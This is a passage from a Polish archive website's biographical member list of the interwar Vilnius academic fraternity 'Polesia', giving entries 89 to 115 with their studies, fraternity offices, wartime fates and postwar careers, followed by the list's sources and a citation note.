 89. Kazimierz Sowiński, początkowo w Korporacji Vilnensia, wystąpił i przeszedł do Polesii, i.p. “Pluszkin”, olderman 1930/31, członek Komisji Rewizyjnej Bratniej Pomocy USB 1933/34, prawnik (?), po wojnie pracownik Urzędu Miasta w Kielcach

 90. Longin Stankiewicz (Staszkiewicz), c. 1933, szybko wystąpił (?), prawnik, po wojnie w Ministerstwie Finansów
 91. Czesław (?) Szauman-Szumski,
 92. Ibrahim Szegłdewicz, Tatar
 93. Bohdan Szpądrowski, (ok. 1905 - ) student prawa UW (?), student USB, akt. 1928-32, wiceprezes 1931/32, wiceprezes Wileńskiego Koła Międzykorporacyjnego, członek Zarządu Koła Prawników 1928/29, członek Komisji Rewizyjnej Bratniej Pomocy USB 1930/31, prawnik
 94. Czesław Szpądrowski, student USB, założyciel Polesii, akt. 1925-28, pierwszy wiceprezes 1925, prawnik, prokurator wojskowy w Armii gen. Berlinga, po wojnie wiele lat więziony

  Walenty Szwabowicz, 1937 (?).

 95. Walenty Szwabowicz, (14 lutego 1916 w Żłobinie - 1940 w Katyniu), s. Piotra i Antoniny z Krzywickich, student prawa USB, członek Zarządu Koła Prawników 1938/39, ppor. rez., przydzielony do 79 Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD

 96. Leszek (Leon) Ślaski-Suchorzewski, c. 1933, chemik, uczestnik Powstania Warszawskiego, wywieziony do Niemiec, wyemigrował do Brazylii

  Antoni Śnieżko, ok. 1928 r. (?).

 97. Antoni Śnieżko, początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii

  Witold Świerzewski, 1938 r. (?).

 98. Witold Świerzewski, (20 września 1913 w Carskim Siole - 12 marca 1988 w Warszawie) s. Stanisława i Aniela z d. Yele, absolwent Gimnazjum Zygmunta Augusta w Wilnie, student i absolwent 1937 prawa USB, c. 1934-35, prezes Bratniej Pomocy USB 1934/35, 1935/36 oraz 1936/37, przewodniczący Komisji Rewizyjnej 1933/34 oraz Sądu Koleżeńskiego Bratniej Pomocy USB 1937/38, przewodniczący Komisji Rewizyjnej 1935/36 oraz prezes 1936 Młodzieży Wszechpolskiej, aplikant adwokacki, działacz SN, więzień Berezy Kartuskiej 1938, żołnierz AK ps. “Bartek”, członek Delegatury Rządu RP na Okręg Wileński, przywódca SN w Wilnie podczas okupacji, z ramienia SN członek Konwentu Stronnictw Politycznych przy Delegaturze Rządu RP na Okręg Wileński, więzień Gestapo, od maja 1944 w Warszawie, pracownik Departamentu Informacji i Propagandy Delegatury, po wojnie nie mógł pracować jako adwokat, pracował w wielu miejscach m.in. jako redaktor w Państwowym Wydawnictwie Technicznym, pochowany na Cmentarzu na Służewie w Warszawie

 99. Hipolit Tołłoczko, ( - 1939-44) początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii, olderman 1935 (?), w czasie wojny rozstrzelany wraz z całą rodziną na Grodzieńszczyźnie
 100. Henryk Wasilewski, student PW, skarbnik 1928/29
 101. Stanisław Wener, początkowo w Vilnensii, z której wystąpił, c. 1934-35 Polesia, prezes Towarzystwa Farmaceutycznego “Lechia” 1931/32, członek Komisji Rewizyjnej Bratniej Pomocy USB 1932/33, przewodniczący Zrzeszenia Kół Naukowych USB 1932/33, członek Bratniej Pomocy USB 1934/35 i 1935/36, farmaceuta
 102. Bohdan Wieczfiński, (13 września 1913 na Wołyniu - ) c. 1936, członek Zarządu Bratniej Pomocy USB 1936/37, inż. rolnik USB, po wojnie nauczyciel w Słupsku
 103. Zygmunt Wiśniewski, ochotnik 1920, kawaler Virtuti Militarii, początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii, żołnierz kampanii wrześniowej 1939, jeniec oflagu, zginął ratując kolegów ze zbombardowanego baraku
 104. Janusz Wałlejko, sekretarz 1930/31, prezes 1931/32, prezes Wileńskiego Koła Międzykorporacyjnego 1931/32

  Witold Wołłejko, 9 V 1931 r.

 105. Witold Karol Wołłejko, (18 marca 1912 w maj. Sesiki k. Wilkomierza - 18 lutego 2009 w Warszawie) absolwent Gimnazjum im. Króla Zygmunta Augusta w Wilnie, harcerz Wileńskiej Błękitnej Jedynki Żeglarskiej, student prawa USB, c. 1931, sekretarz 1933 i prezes Polesii, członek Zarządu Koła Prawników 1934/35, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu, mgr prawa USB, aplikant sądowy w zamiejsowym wydziale wileńskiego Sądu Okręgowego w Lidzie, żołnierz wojny obronnej 1939 w II szwadronie 4. Pułku Ułanów Zaniemieńskich, wzięty do niewoli sowieckiej pod Gródkiem Jagiellońskim, jeniec Starobielska 1939, w drodze wymiany więźniów przekazany Litwinom, od grudnia 1939 w konspiracji żołnierz ZWZ-AK, oficer Okręgu Nowogródzkiego AK oraz komendy 3 Wileńskiej Brygady AK “Szczerbca” ps. “Karol”, uczestnik Operacji Ostra Brama, pracownik Biura Pełnomocnika ds. Ewakuacji Ludności Polskiej z Litewskiej SSR, w styczniu 1945 aresztowany przez NKGB 1944, zwolniony w kwietniu 1945 dzięki interwencji kierownika Biura Pełnomocnika ds. Ewakuacji, po wojnie od 1948 adwokat, autor publikacji z zakresu prawa wodnego, odznaczony Krzyżem Walecznych, Krzyżem Oficerskim Polonia Restituta, pochowany na wojskowych Powązkach w Warszawie Vide także nekrolog w Aktualności 2009.

 106. Zygmunt Wołłodko, student PW, akt. 1928
 107. Aleksander Wyrzykowski, założyciel Polesii, student PL (Lwów), akt. 1925-28
 108. Antoni Zahorski, c. koniec lat 20-tych, ukończył wojskowe studia sanitarne, lekarz

  Stanisław Zarako-Zarakowski, prawd. koniec lat 20-tych.

 109. Stanisław Zarako-Zarakowski, (7 listopada 1907 w m. Swołna, Ujezd Dryssa w guberni witebskiej - 11 kwietnia 1998 w Warszawie) syn Stanisława i Heleny z d. Samonowicz, ukończył gimnazjum w Kobryniu, studiował prawo USB 1928-30 oraz 1933-35, sekretarz 1930, olderman 1931/32, po wojnie w prokuraturze i sądownictwie wojskowym, uczestnik wielu procesów stalinowskich, w których oskarżał, zatwierdzał i wydawał wyroki śmierci, członek PZPR, naczelny prokurator wojskowy od 2 lipca 1950 do 19 kwietnia 1956, odpowiedzialny za wydawanie wyroków śmierci na członków podziemia niepodległościowego, generał brygady Wojska Polskiego zdegradowany w 1991 do szeregowca, po zwolnieniu ze służby w 1956 pracował jako zastępca dyrektora Centralnego Zarządu Obrotu Produktami Naftowymi w latach 1956-1957, i naczelnik Wydziału Prawnego Ministerstwa Handlu Zagranicznego i Centralnego Zarządu Ceł (1957-1968), nie poniósł odpowiedzialności za swoje czyny zarówno w okresie PRL, jak i III RP

 110. Franciszek Zawisza, student USB, przed wojna działacz Polonii na Litwie Kowieńskiej

  Michał Zienkowicz, druga połowa lat 30-tych.

 111. Michał Zienkowicz, ( - 1939 w Kowlu) absolwent Liceum Krzemienieckiego, c. 1931, student i absolwent USB, i.p. “Miszka”, działacz narodowy, oficer rez. artylerii, prawnik, zginął w czasie bombardowania Kowla

  Józef Zwinogrodzki, 1937 (?).

 112. Józef Zwinogrodzki, (27 grudnia 1918 w Winnicy na Podolu - 16 sierpnia 2005 w Warszawie) absolwent Gimnazjum im. Karola hr. Brzostowskiego w Suwałkach 1935, student medycyny w Monachium 1936 oraz USB 1937-39, c. 1936 ?, i.p. “Grat”, olderman 1939, ppor. w kampanii wrześniowej, internowany na Litwie, wraca do kraju i wstępuje do ZWZ-AK, m.in. w BIP, dowódca Batalionu “Bohdanka” 77 pp. AK na Nowogródczyźnie, awansowany do stopnia majora i odznaczony Srebrnym Krzyżem Virtuti Militarii V klasy, członek wileńskiej Delegatury Rządu 1944, kierownik Wydziału Informacji i Pracy oraz Wydziału Bezpieczeństwa, aresztowany w 1945, skazany na 15 lat katorgi, więziony w Workutłagu i Rieczłagu, wrócił w 1956, doktor medycyny AM w Gdańsku 1957, chirurg ortopeda, pracownik Kliniki Ortopedycznej AM w Warszawie, w 1999 awansowany na podpułkownika, odznaczony Krzyżem Partyzanckim, Krzyżem Komandorskim OOP, Złotym Krzyżem Zasługi, Krzyżem Armii Krajowej, pochowany na Cmentarzu Wojskowym na Powązkach

 113. Marian Żero, założyciel Polesii, student UW (?), akt. 1925-28
 114. Marian Żołnierkiewicz, student WSH, akt. 1928
 115. Aleksander Żuk, prawnik

Pieczęć Polesii, 1933 r.

Listę członków opracowano na podstawie:

1) Zbigniew Nanowski, Lista członków Polskiej Korporacji Akademickiej Polesia (Wilno), (w:) Polskie Korporacje Akademickie 1997, nr 15, s. 21 i n.,

2) materiałów archiwalnych z Archiwum Korporacyjnego,

3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Polesia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 5 II 2015 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Akademicka Korporacja “Polesia” (Wilno), (na:) www.archiwumkorporacyjne.pl, stan 5 II 2015 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }